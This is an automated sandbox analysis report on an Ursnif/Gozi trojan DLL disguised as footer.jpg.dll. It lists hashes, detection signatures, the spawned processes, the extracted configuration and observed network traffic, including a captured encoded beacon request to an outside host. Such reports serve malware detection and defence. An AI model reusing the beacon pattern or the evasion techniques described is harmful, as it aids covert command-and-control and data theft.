Loading ...

Play interactive tourEdit tour

Analysis Report footer.jpg.dll

Overview

General Information

Sample Name:footer.jpg.dll
Analysis ID:350960
MD5:9df5fcca1aadec6333301aca7a13c481
SHA1:f3445c636e0a702eff7782b9e8eeb4ca84f842ff
SHA256:8df914f790a6e5eb07042cce36ea9a23e23cdc1610d930f306f9ef55b6d8a2c5
Tags:dllgoziisfbmiseursnif

Most interesting Screenshot:

Detection

Ursnif
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Machine Learning detection for sample
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6024 cmdline: loaddll32.exe 'C:\Users\user\Desktop\footer.jpg.dll' MD5: 99D621E00EFC0B8F396F38D5555EB078)
    • regsvr32.exe (PID: 4164 cmdline: regsvr32.exe /s C:\Users\user\Desktop\footer.jpg.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 6808 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 4984 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 768 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 4928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6808 CREDAT:82966 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@045012ceL", "dns": "045012", "version": "250177", "uptime": "363", "crc": "1", "id": "7251", "user": "4229768108f8d2d8cdc8873a86c00093", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.735284219.0000000005258000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.735314560.0000000005258000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.735145270.0000000005258000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.735337124.0000000005258000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.735348930.0000000005258000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: regsvr32.exe.4164.1.memstrMalware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@045012ceL", "dns": "045012", "version": "250177", "uptime": "363", "crc": "1", "id": "7251", "user": "4229768108f8d2d8cdc8873a86c00093", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: footer.jpg.dllReversingLabs: Detection: 12%
            Machine Learning detection for sampleShow sources
            Source: footer.jpg.dllJoe Sandbox ML: detected
            Source: 1.2.regsvr32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: footer.jpg.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Uses new MSVCR DllsShow sources
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49768 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04877AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,1_2_04877AA8
            Source: Joe Sandbox ViewIP Address: 104.20.185.68 104.20.185.68
            Source: Joe Sandbox ViewIP Address: 143.204.15.36 143.204.15.36
            Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
            Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: global trafficHTTP traffic detected: GET /images/6dayin3l_2BW7S5N/Gnz0LZyN5g7qBCp/B248LI31NTm818fYOn/fysFBCtAX/mFx67NJKGVDz3pFMjIdO/XoUT0M9jZwrwMgD0uAp/CgYK6Ygv23owJGncqjZFiC/pOwFjCE84YiD0/1phiKHMB/f6QyQEHF3TG2tTdcJHXtR52/qEFsUyav_2/BP9zanZDbdL9eB1Zb/YFBtE8bSAfxP/4sQIJiENwsY/qwZf6.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: ocsp.sca1b.amazontrust.comConnection: Keep-Alive
            Source: de-ch[1].htm.4.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6ba1eb09,0x01d6ff7a</date><accdate>0x6ba1eb09,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba6afc4,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6ba6afc4,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.3.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6ba9120d,0x01d6ff7a</date><accdate>0x6ba9120d,0x01d6ff7a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: de-ch[1].htm.4.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
            Source: de-ch[1].htm.4.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: www.msn.com
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns#
            Source: de-ch[1].htm.4.drString found in binary or memory: http://ogp.me/ns/fb#
            Source: auction[1].htm.4.drString found in binary or memory: http://popup.taboola.com/german
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: msapplication.xml.3.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.3.drString found in binary or memory: http://www.google.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
            Source: msapplication.xml2.3.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.3.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.3.drString found in binary or memory: http://www.reddit.com/
            Source: footer.jpg.dllString found in binary or memory: http://www.symantec.com
            Source: msapplication.xml5.3.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.3.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.3.drString found in binary or memory: http://www.youtube.com/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://amzn.to/2TTxhNg
            Source: auction[1].htm.4.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
            Source: de-ch[1].htm.4.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://client-s.gateway.messenger.live.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
            Source: de-ch[1].htm.4.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
            Source: de-ch[1].htm.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.4.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
            Source: de-ch[1].htm.4.drString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&amp;bhid=60140e93c5b18a0414cccba8&a
            Source: auction[1].htm.4.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
            Source: auction[1].htm.4.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
            Source: de-ch[1].htm.4.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
            Source: de-ch[1].htm.4.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1612940399&amp;rver
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1612940399&amp;rver=7.0.6730.0&am
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/logout.srf?ct=1612940400&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
            Source: de-ch[1].htm.4.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1612940399&amp;rver=7.0.6730.0&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
            Source: de-ch[1].htm.4.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/#qt=mru
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
            Source: de-ch[1].htm.4.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com/about/en/download/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;Fotos
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
            Source: de-ch[1].htm.4.drString found in binary or memory: https://outlook.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/calendar
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
            Source: de-ch[1].htm.4.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
            Source: imagestore.dat.4.dr, imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dy5jJ.img?h=368&amp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
            Source: de-ch[1].htm.4.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://support.skype.com
            Source: de-ch[1].htm.4.drString found in binary or memory: https://twitter.com/
            Source: 85-0f8009-68ddb2ab[1].js.4.drString found in binary or memory: https://twitter.com/i/notifications;Ich
            Source: de-ch[1].htm.4.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
            Source: iab2Data[1].json.4.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
            Source: {9561B4BB-6B6D-11EB-90EB-ECF4BBEA1588}.dat.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpz
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/attacke-am-stadelhofen-sorgt-f%c3%bcr-etliche-hasskommentare/ar
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/bub-12-prallt-mit-velo-in-auto-und-wird-schwer-verletzt/ar-BB1d
            Source: de-ch[1].htm.4.drString found in binary or memory: https://www.msn.com/de-ch/news/other/corona-hinterl%c3%a4sst-tiefe-spuren-unispital-z%c3%bcrich-schr
